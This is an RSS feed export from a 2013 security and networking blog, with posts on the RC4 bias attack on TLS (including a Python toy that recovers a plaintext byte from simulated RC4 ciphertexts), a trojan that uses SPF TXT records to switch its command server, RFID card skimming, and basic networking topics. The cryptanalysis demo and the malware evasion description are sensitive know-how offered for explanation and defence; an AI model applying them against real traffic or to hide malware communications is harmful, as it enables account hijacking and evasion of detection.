<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/" xmlns:blogger="http://schemas.google.com/blogger/2008" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr="http://purl.org/syndication/thread/1.0" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0"><channel><atom:id>tag:blogger.com,1999:blog-2208382470258337434</atom:id><lastBuildDate>Tue, 14 May 2013 07:46:04 +0000</lastBuildDate><category>Make Money Online</category><category>Backtrack</category><category>Desktop Security</category><category>Website Hacking</category><category>Metasploit</category><category>Hacking News</category><category>Google Tips and Tricks</category><category>Windows 7 Tips n Tricks</category><category>Blogger tips and tricks</category><category>All about Google</category><category>Hacking Tools</category><category>android</category><category>Security News</category><category>Security Tools</category><category>Exploits</category><category>Firefox tips and tricks</category><category>Orkut</category><category>Miscellaneous</category><category>XP Tips and Tricks</category><category>Ethical Hacking</category><category>WiFi Hacking</category><category>Facebook</category><category>Viruses</category><category>WiMax</category><category>Latest Trends in technologies</category><title>TechKranti</title><description>Information Revolution</description><link>http://www.techkranti.com/</link><managingEditor>noreply@blogger.com (Rahul Sachin Amey)</managingEditor><generator>Blogger</generator><openSearch:totalResults>177</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><atom10:link 
xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="http://feeds.feedburner.com/blogspot/Gotp" /><feedburner:info uri="blogspot/gotp" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2208382470258337434.post-1919259468542188761</guid><pubDate>Sat, 16 Mar 2013 08:57:00 +0000</pubDate><atom:updated>2013-03-16T14:32:21.101+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Website Hacking</category><category domain="http://www.blogger.com/atom/ns#">Security News</category><category domain="http://www.blogger.com/atom/ns#">Hacking News</category><category domain="http://www.blogger.com/atom/ns#">Ethical Hacking</category><category domain="http://www.blogger.com/atom/ns#">Exploits</category><title>Vulnerability in RC4 stream cipher can get your Gmail, Facebook or Paypal hacked</title><description>&lt;a href="http://1.bp.blogspot.com/-6RmOJH_NAmU/UUQydHsnfEI/AAAAAAAAAEI/72CXKuGfeL8/s1600/RC4+Jar.png" style="clear: right; float: right;"&gt;&lt;img height="340" src="http://1.bp.blogspot.com/-6RmOJH_NAmU/UUQydHsnfEI/AAAAAAAAAEI/72CXKuGfeL8/s640/RC4+Jar.png" width="273" /&gt;&lt;/a&gt;Security researchers at Royal Holloway, University of London and the University of Illinois at Chicago have published a practical attack on the RC4 stream cipher as it is used in TLS. RC4 is simple and fast, and major sites such as Google, Facebook and PayPal use it to encrypt your traffic when you connect to them over HTTPS. The attack exploits statistical biases in the RC4 keystream: when the same plaintext (for example a session cookie) is encrypted many times under different keys, the ciphertext bytes are not uniformly distributed, and careful analysis of a large number of captured encryptions lets the attacker recover the original plaintext.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;How does this matter to you as a normal web user?&lt;/b&gt;&lt;br /&gt;
After you log in, every request your browser makes to Gmail, Facebook or any other site carries an authentication (session) cookie so that the server can tell the request comes from an authenticated user. Over SSL/TLS (in simple terms, when your browser shows HTTPS) this cookie travels encrypted, so an attacker who sniffs your traffic cannot read or reuse it. The RC4 result changes that picture. It is not TLS itself that is broken but the RC4 cipher it relies on: the keystream RC4 produces is biased, most strongly in its first bytes, which is exactly where the cookie sits in each encrypted request. An attacker who captures enough encrypted copies of the same cookie, each sent under a fresh TLS key, can, by careful statistical analysis, recover the cleartext cookie hidden in the encrypted messages.&lt;br /&gt;
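As an added illustration of that bias (example code written for this page, not the researchers' attack code), the block below implements RC4, encrypts a fixed cookie under thousands of random keys and recovers one plaintext byte from the ciphertexts alone. It uses the best-known single bias, Mantin and Shamir's observation that the second keystream byte is zero about twice as often as chance, so the most frequent ciphertext byte at that position is the plaintext byte. The 16-byte key length, the sample count and the sample cookie are assumptions made for the demonstration.&lt;br /&gt;

```python
# Added example: recovering a plaintext byte from RC4 ciphertexts by exploiting
# the second-byte keystream bias (Mantin-Shamir). Illustrates the principle
# behind the Royal Holloway attack; key size, sample count and the sample
# cookie below are assumptions, not values from the paper.
import random
from collections import Counter

def rc4_keystream(key, n):
    """Return the first n keystream bytes of RC4 for the given key."""
    S = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm (KSA)
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    out = []
    i = j = 0
    for _ in range(n):                        # pseudo-random generation (PRGA)
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) % 256])
    return bytes(out)

def rc4_encrypt(key, plaintext):
    """Stream-cipher encryption: plaintext XOR keystream."""
    ks = rc4_keystream(key, len(plaintext))
    return bytes(p ^ k for p, k in zip(plaintext, ks))

def recover_second_byte(ciphertexts):
    """Given many ciphertexts of the same plaintext under independent keys,
    guess plaintext byte 2 (index 1) as the most common ciphertext byte there.
    Z2 is 0 with probability about 1/128 instead of 1/256, so C2 = P2 XOR 0
    shows up roughly twice as often as any other value."""
    counts = Counter(c[1] for c in ciphertexts)
    return counts.most_common(1)[0][0]

def simulate(plaintext, samples=16384, seed=1):
    """Encrypt a fixed plaintext (standing in for an auth cookie) under
    `samples` random 16-byte keys and recover its second byte."""
    rng = random.Random(seed)                 # fixed seed keeps the run reproducible
    cts = [rc4_encrypt(bytes(rng.getrandbits(8) for _ in range(16)), plaintext)
           for _ in range(samples)]
    return recover_second_byte(cts)

if __name__ == "__main__":
    cookie = b"session=3f9a"                  # constructed sample plaintext
    guess = simulate(cookie)
    print("plaintext byte 2:", cookie[1], "recovered:", guess)
```

The real attack works the same way but uses the biases of all of the first 256 keystream positions at once, which is why it needs far more captured encryptions than this single-position toy, and why the cookie's position inside the HTTP request matters.&lt;br /&gt;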
&lt;br /&gt;
&lt;b&gt;So what happens if someone has your cookie?&lt;/b&gt;&lt;br /&gt;
If an authentication cookie falls into the wrong hands, it can be replayed to make the remote server believe that the request is coming from the person it was stolen from; no password is needed. Sounds difficult? It is not. Cookie stealing is a very old-school way of hijacking user accounts, and even then not much was done on the cookie implementation side to make the cookies themselves more secure. Instead, cookies were protected by encrypting them in transit.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Should you be afraid?&lt;/b&gt;&lt;br /&gt;
Not right now, but be aware. This is a relatively new result and mass exploitation has not been seen. The attacker must be able to capture your encrypted traffic (for example by being on the same network as you), and must also collect the same cookie encrypted under a very large number of different TLS sessions; the researchers' figures run into the hundreds of millions of encryptions for reliable recovery. Until sites move off RC4, the practical mitigation is on the server side: prefer other cipher suites.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Which websites use RC4?&lt;/b&gt;&lt;br /&gt;
&lt;a href="http://4.bp.blogspot.com/-MZMY1Lhs-qc/UUQoxlsJdZI/AAAAAAAAAD0/FutPiHEEhLU/s1600/Facebook.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="251" src="http://4.bp.blogspot.com/-MZMY1Lhs-qc/UUQoxlsJdZI/AAAAAAAAAD0/FutPiHEEhLU/s640/Facebook.png" width="640" /&gt;&lt;/a&gt;&lt;br /&gt;
As per the researchers' figures, about 50% of the Internet's HTTPS traffic is protected with RC4. The irony is that this mass migration to RC4 happened because of attacks on the CBC (cipher-block chaining) cipher suites in TLS, most recently BEAST and Lucky Thirteen, the latter from the same Royal Holloway team. CBC is a mode of operation rather than an algorithm, and its TLS problems lay in padding and MAC handling, not in the underlying block cipher. We will probably now see a further migration from RC4 to stronger cipher suites, such as AES-GCM in TLS 1.2.&lt;br /&gt;
&lt;br /&gt;
RC4 itself has long had a poor reputation. It was designed in 1987 (quite old) and was used in the WEP (Wired Equivalent Privacy) protocol for encryption, where weaknesses in its key scheduling (the FMS attack) made WEP keys recoverable from captured traffic. We gave WEP RIP status long ago, yet RC4 is still being used by big names on the Internet.&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/Gotp/~4/p8hbujiD0FY" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/blogspot/Gotp/~3/p8hbujiD0FY/Vulnerability-in-RC4.html</link><author>noreply@blogger.com (Amey Anekar)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-6RmOJH_NAmU/UUQydHsnfEI/AAAAAAAAAEI/72CXKuGfeL8/s72-c/RC4+Jar.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.techkranti.com/2013/03/Vulnerability-in-RC4.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2208382470258337434.post-3191353867248684887</guid><pubDate>Sat, 09 Mar 2013 07:46:00 +0000</pubDate><atom:updated>2013-03-09T13:34:16.867+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">WiMax</category><title>Wi-Max !!!</title><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;b&gt;WiMAX&lt;/b&gt; (Worldwide Inter-operability for Microwave Access) is a wireless digital communications system, also known as &lt;b&gt;IEEE 802.16&lt;/b&gt;, that is intended for wireless "metropolitan area networks". WiMAX can provide broadband wireless access (BWA) up to 30 miles (50 km) for fixed stations, and 3 - 10 miles (5 - 15 km) for mobile stations ( WiFi/802.11 is limited 100 - 300 feet).&lt;br /&gt;&lt;br /&gt;The name "WiMAX" was given by the WiMAX Forum, which was formed in June 2001 to promote conformity and interoperability of the standard. WiMAX operates on both licensed and non-licensed frequencies. WiMAX supports WiFi-like data rates, but the issue of interference is lessened. WiMAX is a second-generation protocol that allows for more efficient bandwidth use, interference avoidance, and is intended to allow higher data rates over longer distances.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Fixed WiMAX&lt;/b&gt;&lt;br /&gt;WiMAX provides fixed, portable or mobile non-line-of sight service from a base station to a subscriber station, also known as customer premise equipment (CPE).&amp;nbsp; Some goals for WiMAX include a radius of service coverage of 6 miles from a WiMAX base station for point-to-multipoint, non-line-of-sight service.&amp;nbsp; This service should deliver approximately 40 Mbps for fixed and portable access applications.&amp;nbsp; That WiMAX cell site should offer enough bandwidth to support hundreds of businesses with T1 speeds and thousands of residential customers with the equivalent of DSL services from one base station.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Mobile WiMAX&lt;/b&gt;&lt;br /&gt;Mobile WiMAX takes the fixed wireless application a step further and enables cell phone-like applications on a much larger scale.&amp;nbsp; For example, mobile WiMAX enables streaming video to be broadcast from a speeding police or other emergency vehicle at over 70 MPH.&amp;nbsp; It 
potentially replaces cell phones and mobile data offerings from cell phone operators such as EvDo, EvDv and HSDPA.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;A WiMAX tower&lt;/b&gt;, similar in concept to a cell-phone tower - A single WiMAX tower can provide coverage to a very large area -- as big as 3,000 square miles (~8,000 square km). A WiMAX tower station can connect directly to the Internet using a high-bandwidth, wired connection (for example, a T3 line). It can also connect to another WiMAX tower using a line-of-sight, microwave link. This connection to a second tower (often referred to as a backhaul), along with the ability of a single tower to cover up to 3,000 square miles, is what allows WiMAX to provide coverage to remote rural areas.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;A WiMAX receiver&lt;/b&gt; - The receiver and antenna could be a small box or PCMCIA card, or they could be built into a laptop the way WiFi access is today. &lt;br /&gt;&lt;br /&gt;It provides two types of wireless services:&lt;br /&gt;&lt;br /&gt;There is the &lt;b&gt;non-line-of-sight&lt;/b&gt;, WiFi sort of service, where a small antenna on your computer connects to the tower. In this mode, WiMAX uses a lower frequency range -- 2 GHz to 11 GHz (similar to WiFi).&lt;br /&gt;&lt;br /&gt;There is &lt;b&gt;line-of-sight service&lt;/b&gt;, where a fixed dish antenna points straight at the WiMAX tower from a rooftop or pole. The line-of-sight connection is stronger and more stable, so it's able to send a lot of data with fewer errors. Line-of-sight transmissions use higher frequencies, with ranges reaching a possible 66 GHz. At higher frequencies, there is less interference and lots more bandwidth. 
&lt;/span&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/Gotp/~4/V_inpNqf_hc" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/blogspot/Gotp/~3/V_inpNqf_hc/wi-max.html</link><author>noreply@blogger.com (Rohan Patil)</author><thr:total>0</thr:total><feedburner:origLink>http://www.techkranti.com/2013/03/wi-max.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2208382470258337434.post-7014948595710936804</guid><pubDate>Mon, 18 Feb 2013 14:13:00 +0000</pubDate><atom:updated>2013-02-18T19:43:19.448+05:30</atom:updated><title>Why Area 0 in OSPF is a Backbone network?</title><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
In &lt;b&gt;OSPF&lt;/b&gt;, whenever more than one area is configured, area 0 must be the &lt;b&gt;backbone area&lt;/b&gt;. Network design best practice is therefore to start with area 0 and expand into other areas from there.&lt;br /&gt;
&lt;br /&gt;
The idea is that every other area attaches directly to area 0, which sits at the centre of the topology. Routing information generated in each area is summarised into area 0 by that area's border router (ABR), and area 0 then distributes it to the other areas. Forcing all inter-area routes through the backbone is what prevents inter-area routing loops.&lt;br /&gt;
&lt;br /&gt;
If an area cannot be physically connected to area 0 (which is mandatory), we need to configure a &lt;b&gt;Virtual Link&lt;/b&gt; between that area and area 0, provided there is a common transit area that is physically connected to both.&lt;br /&gt;
&lt;br /&gt;
Example: consider three OSPF areas (area 0, area 1 and area 2). Area 0 and area 1 are physically connected to each other, and area 2 is physically connected to area 1 but cannot connect to area 0. In this situation we configure a virtual link between area 0 and area 2 across area 1, the transit area. The transit area must be a normal area; a stub area cannot carry a virtual link.&lt;br /&gt;
&lt;br /&gt;
But a virtual link depends entirely on the physical path through the transit area, so if that physical link fails the virtual link fails with it. Because the virtual link is logically part of area 0, any authentication configured for area 0 applies to it too and must be configured on both ends.&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/Gotp/~4/hD-DGNP4Mq8" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/blogspot/Gotp/~3/hD-DGNP4Mq8/why-area-0-in-ospf-is-backbone-network.html</link><author>noreply@blogger.com (Rohan Patil)</author><thr:total>0</thr:total><feedburner:origLink>http://www.techkranti.com/2013/02/why-area-0-in-ospf-is-backbone-network.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2208382470258337434.post-2968018408545499314</guid><pubDate>Mon, 18 Feb 2013 13:48:00 +0000</pubDate><atom:updated>2013-02-19T13:13:05.297+05:30</atom:updated><title>Why UDP is connectionless?</title><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
1) &lt;b&gt;TCP&lt;/b&gt; is &lt;b&gt;reliable&lt;/b&gt; because it provides &lt;b&gt;Acknowledgement&lt;/b&gt;: received data is acknowledged, lost segments are retransmitted, and bytes are delivered to the application in the order they were sent. It establishes a connection (the three-way handshake) before any data flows.&lt;br /&gt;
&lt;br /&gt;
2) &lt;b&gt;UDP&lt;/b&gt; is &lt;b&gt;unreliable&lt;/b&gt; because it doesn't provide &lt;b&gt;Acknowledgement&lt;/b&gt;: datagrams may be lost, duplicated or arrive out of order, and nothing is retransmitted. In return, a datagram can be sent to many destinations at the same time (broadcast and multicast), which TCP cannot do.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;UDP is connectionless because it never establishes a connection; each datagram stands alone, which is why it is fast.&lt;/b&gt; The security consequence is that, with no handshake, a UDP server has no evidence that the source address on a datagram is genuine, which is why UDP services such as DNS and NTP are the usual vehicles for spoofed reflection and amplification attacks.&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/Gotp/~4/UQKCkCPNyQc" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/blogspot/Gotp/~3/UQKCkCPNyQc/why-udp-is-connectionless.html</link><author>noreply@blogger.com (Rohan Patil)</author><thr:total>0</thr:total><feedburner:origLink>http://www.techkranti.com/2013/02/why-udp-is-connectionless.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2208382470258337434.post-6230079344424781122</guid><pubDate>Mon, 18 Feb 2013 13:27:00 +0000</pubDate><atom:updated>2013-02-18T19:19:02.814+05:30</atom:updated><title>Black Hole in Networking</title><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;b&gt;BLACK HOLE&lt;/b&gt; is a term used for a router (or a route) that silently discards traffic: for example a router that goes down (offline) without the other routers in the network detecting it, so they keep forwarding to it.&lt;br /&gt;
Packets forwarded to that router are dropped and never arrive at their destination.&lt;br /&gt;
Because nothing generates an ICMP &lt;b&gt;destination unreachable message&lt;/b&gt;, the senders are unaware that their data was lost; the failure shows up only as timeouts. Operators also create black holes deliberately, null-routing a prefix to absorb DDoS traffic, so the term is not always a fault.&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/Gotp/~4/R3VCIvH6WIg" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/blogspot/Gotp/~3/R3VCIvH6WIg/black-hole-in-networking.html</link><author>noreply@blogger.com (Rohan Patil)</author><thr:total>0</thr:total><feedburner:origLink>http://www.techkranti.com/2013/02/black-hole-in-networking.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2208382470258337434.post-4757186956989216558</guid><pubDate>Wed, 13 Feb 2013 06:49:00 +0000</pubDate><atom:updated>2013-02-13T12:23:45.101+05:30</atom:updated><title>TechKranti crosses 1 million mark</title><description>TechKranti has crossed the 1 million mark on Alexa. &lt;a href="http://www.alexa.com/siteinfo/techkranti.com#trafficstats"&gt;Click here&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
Next target is to be&amp;nbsp;among&amp;nbsp;the top 100,000.&lt;br /&gt;
&lt;br /&gt;
Thank you All.&lt;img src="http://feeds.feedburner.com/~r/blogspot/Gotp/~4/ambI_VP0nMM" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/blogspot/Gotp/~3/ambI_VP0nMM/techkranti-crosses-1-million-mark.html</link><author>noreply@blogger.com (Amey Anekar)</author><thr:total>0</thr:total><feedburner:origLink>http://www.techkranti.com/2013/02/techkranti-crosses-1-million-mark.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2208382470258337434.post-5605733300742568962</guid><pubDate>Wed, 30 Jan 2013 06:26:00 +0000</pubDate><atom:updated>2013-01-30T12:00:01.380+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Viruses</category><category domain="http://www.blogger.com/atom/ns#">Security News</category><category domain="http://www.blogger.com/atom/ns#">Hacking News</category><category domain="http://www.blogger.com/atom/ns#">Ethical Hacking</category><title>Spachanel Trojan uses SPF to evade anti-virus</title><description>Operating systems nowadays are making it harder and harder for malware writers to find exploitable vulnerabilities. But malware authors are a breed that is ever ready to take on difficult challenges.&lt;br /&gt;
&lt;br /&gt;
A recent trojan known as Spachanel uses SPF (Sender Policy Framework), a protocol designed to prevent email spoofing, to its own advantage. SPF is DNS-based: a domain publishes a TXT record listing the mail servers allowed to send email on its behalf. To understand how the trojan uses SPF for its benefit, let us first look at how SPF works.&lt;br /&gt;
&lt;br /&gt;
Assume an email being sent from alice@send.com to bob@recv.com.&lt;br /&gt;
&lt;br /&gt;
When the email arrives at the spam filter or the mail transfer agent, whichever is configured to check SPF, the system takes the domain of the envelope sender (the SMTP MAIL FROM address, not the From: header the user sees) and makes a DNS query for that domain's TXT record (in our case send.com). An SPF record begins with v=spf1 and lists, through mechanisms such as ip4:, ip6:, a: and include:, the IP addresses or hostnames of the servers authorised to send mail for send.com, ending with a default such as -all (fail anything else) or ~all (softfail). Below is a sample TXT query for send.com. The system then checks the IP address of the connecting mail server against those mechanisms. If it matches, the mail came through a server that send.com authorises, which is not quite the same as proving it came from alice herself. If there is no match, someone is trying to spoof the email to make it appear to come from alice@send.com, and the receiver can reject or flag it according to the record's policy.&lt;br /&gt;
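The check described above, as an added example that is not part of the original post: a minimal SPF evaluator in the spirit of RFC 7208, run against constructed records instead of live DNS. The record for send.com, the include domain, the hostnames and the IP addresses (drawn from the RFC 5737 documentation ranges) are all assumptions made up for the illustration.&lt;br /&gt;

```python
# Added example (not from the original post): a minimal SPF evaluator.
# Records and host addresses are constructed stand-ins for DNS TXT and A
# lookups so that the example runs offline.
import ipaddress

RESULT = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}

def parse_spf(txt):
    """Split 'v=spf1 ...' into (qualifier, mechanism, value) terms.
    Modifiers such as redirect=/exp= are skipped in this example."""
    parts = txt.split()
    if not parts or parts[0].lower() != "v=spf1":
        raise ValueError("not an SPF record: %r" % txt)
    terms = []
    for term in parts[1:]:
        qual = "+"                        # default qualifier is pass
        if term[0] in "+-~?":
            qual, term = term[0], term[1:]
        if "=" in term:
            continue
        mech, _, value = term.partition(":")
        terms.append((qual, mech.lower(), value))
    return terms

def check_spf(domain, sender_ip, records, hosts, depth=0):
    """Evaluate sender_ip against the SPF record of `domain`.
    records: domain -> SPF TXT string   (stand-in for DNS TXT lookups)
    hosts:   hostname -> list of IPs    (stand-in for A/AAAA lookups)"""
    if depth == 10:                       # RFC 7208 caps include recursion
        return "permerror"
    txt = records.get(domain)
    if txt is None:
        return "none"
    ip = ipaddress.ip_address(sender_ip)
    for qual, mech, value in parse_spf(txt):
        if mech in ("ip4", "ip6"):
            net = ipaddress.ip_network(value, strict=False)
            matched = ip.version == net.version and ip in net
        elif mech == "a":
            addrs = hosts.get(value or domain, [])
            matched = ip in [ipaddress.ip_address(a) for a in addrs]
        elif mech == "include":
            # include matches only when the referenced record yields pass
            matched = check_spf(value, sender_ip, records, hosts, depth + 1) == "pass"
        elif mech == "all":
            matched = True
        else:
            matched = False               # mx, ptr, exists not modelled here
        if matched:
            return RESULT[qual]
    return "neutral"                      # nothing matched and no 'all' term

# Constructed sample data: send.com from the post, with an assumed record.
RECORDS = {
    "send.com": "v=spf1 ip4:192.0.2.0/24 a:mail.send.com include:_spf.bulk.example -all",
    "_spf.bulk.example": "v=spf1 ip4:198.51.100.7 ~all",
}
HOSTS = {"mail.send.com": ["203.0.113.5"]}

if __name__ == "__main__":
    for ip in ("192.0.2.44", "203.0.113.5", "198.51.100.7", "198.51.100.8", "2001:db8::1"):
        print(ip, check_spf("send.com", ip, RECORDS, HOSTS))
```

Note that a TXT record is free-form text the domain owner controls and any host on the Internet can query; SPF merely gives one agreed meaning to it, which is exactly the property the trojan described next relies on.&lt;br /&gt;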
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-zG3fgkCHJlI/UQi4aVJA2rI/AAAAAAAAAfY/EzSzgCL7Xg8/s1600/SPF.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="193" src="http://1.bp.blogspot.com/-zG3fgkCHJlI/UQi4aVJA2rI/AAAAAAAAAfY/EzSzgCL7Xg8/s400/SPF.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Now, how does Spachanel use this to its benefit? Spachanel is programmed to send data from the machine it has infected to a server its authors control. Anti-virus vendors learn such signature behaviour: once it is known which IP address or domain name the malware talks to, they add it to their databases, and any attempt to send information to that address is flagged and the infection cleaned. So how does Spachanel evade this? It is configured to change the domain name it communicates with after some days, and its creators announce the new name through the SPF (TXT) record of the previous domain. As long as the SPF record of the current domain still points to that domain, the malware keeps sending to it; once it sees a different name in the record, it switches to the newly received domain. Because TXT lookups are ordinary DNS traffic, this channel is easy to overlook; for defenders, unexpected TXT queries from endpoints are worth watching for.&lt;br /&gt;
&lt;br /&gt;
What does Spachanel steal from the infected machine?&lt;br /&gt;
On the infected machine, Spachanel injects itself into browser processes such as chrome.exe, iexplore.exe and firefox.exe to pop up ads which, when clicked, generate revenue for the malware authors. It has not been reported to steal confidential information from the infected machine, but it is better to clean the machine as soon as you suspect an infection.&lt;img src="http://feeds.feedburner.com/~r/blogspot/Gotp/~4/8dlhdmjtQpg" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/blogspot/Gotp/~3/8dlhdmjtQpg/spachanel-trojan-uses-spf-to-evade-anti.html</link><author>noreply@blogger.com (Rahul Sachin Amey)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-zG3fgkCHJlI/UQi4aVJA2rI/AAAAAAAAAfY/EzSzgCL7Xg8/s72-c/SPF.png" height="72" width="72" /><thr:total>0</thr:total><georss:featurename>Mumbai, Maharashtra, India</georss:featurename><georss:point>19.0759837 72.87765590000004</georss:point><georss:box>18.5957847 72.23220890000003 19.556182699999997 73.52310290000004</georss:box><feedburner:origLink>http://www.techkranti.com/2013/01/spachanel-trojan-uses-spf-to-evade-anti.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2208382470258337434.post-7056938723577752627</guid><pubDate>Sun, 27 Jan 2013 09:10:00 +0000</pubDate><atom:updated>2013-01-30T11:59:05.041+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Security News</category><category domain="http://www.blogger.com/atom/ns#">Exploits</category><title>Credit Card RFID Skimming: The saga continues...</title><description>Credit cards have been one of the most lucrative targets for fraudsters. As per the U.S. Department of Justice, about 10% of Americans have been victims of credit card fraud, and worldwide the total amount lost to credit card fraud is $5.5 billion.&lt;br /&gt;
&lt;br /&gt;
The most covert form of credit card fraud is card skimming. Skimming captures the card's magnetic stripe data with a reader that looks like, or is hidden inside, a legitimate PoS terminal or ATM card slot where a merchant or customer swipes the card; the captured data is then written onto cloned cards. All of this happens behind the scenes. The victim does not realise that he has been defrauded until he receives the notification SMS for a purchase he never made, or even worse, if he is not registered for alerts, when he receives his monthly statement. To thwart these skimming attacks, Europay, MasterCard and Visa joined hands to develop the EMV chip standard, which replaces the static stripe data with cryptograms generated by the card. EMV implementations too have been proved vulnerable to attacks. [&lt;a href="http://en.wikipedia.org/wiki/EMV#Vulnerabilities" target="_blank"&gt;Ref&lt;/a&gt;]&lt;br /&gt;
&lt;br /&gt;
Lately, with the boom in radio-frequency technology, most payment brands have been enticing their customers onto RFID (contactless) cards. But there is a standing weakness in RFID: any reader within range can request the data the card transmits, and a contactless payment card answers without any PIN or action from the holder, so a concealed reader can pull the card number and expiry date through a wallet or pocket. The following YouTube video demonstrates the weakness:&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;object class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://0.gvt0.com/vi/lLAFhTjsQHw/0.jpg" height="266" width="320"&gt;&lt;param name="movie" value="http://www.youtube.com/v/lLAFhTjsQHw&amp;fs=1&amp;source=uds" /&gt;&lt;param name="bgcolor" value="#FFFFFF" /&gt;&lt;param name="allowFullScreen" value="true" /&gt;&lt;embed width="320" height="266"  src="http://www.youtube.com/v/lLAFhTjsQHw&amp;fs=1&amp;source=uds" type="application/x-shockwave-flash" allowfullscreen="true"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;
&lt;br /&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/Gotp/~4/axH07t7_2TE" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/blogspot/Gotp/~3/axH07t7_2TE/credit-card-rfid-skimming-saga-continues.html</link><author>noreply@blogger.com (Rahul Sachin Amey)</author><thr:total>0</thr:total><feedburner:origLink>http://www.techkranti.com/2013/01/credit-card-rfid-skimming-saga-continues.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2208382470258337434.post-5889313089440451035</guid><pubDate>Sun, 20 Jan 2013 07:45:00 +0000</pubDate><atom:updated>2013-01-20T13:15:30.446+05:30</atom:updated><title>Google challenges the sheer existence of passwords</title><description>When computers were invented, people depended on obscurity for their security. Few people knew how to use computers, let alone how to exploit them. But as the line between obscurity and security thinned, passwords were invented. Now that a lot of people were becoming computer literate, it was easier for a not-so-genius to exploit open systems on the internet with very little knowledge about the system. Authentication became important. Users were authenticated on the basis of 'something they know', called the password. But passwords have had a very bad history. From social engineering to password cracking, passwords have been the prime target of attacks, and these breaches have cost organizations millions of dollars.&lt;br /&gt;
&lt;br /&gt;
Now Google, known for its path-breaking way of looking at things, is challenging the very existence of passwords as the sole mode of authentication. Google is considering a hardware-based authentication solution to the password problem.&lt;br /&gt;
&lt;br /&gt;
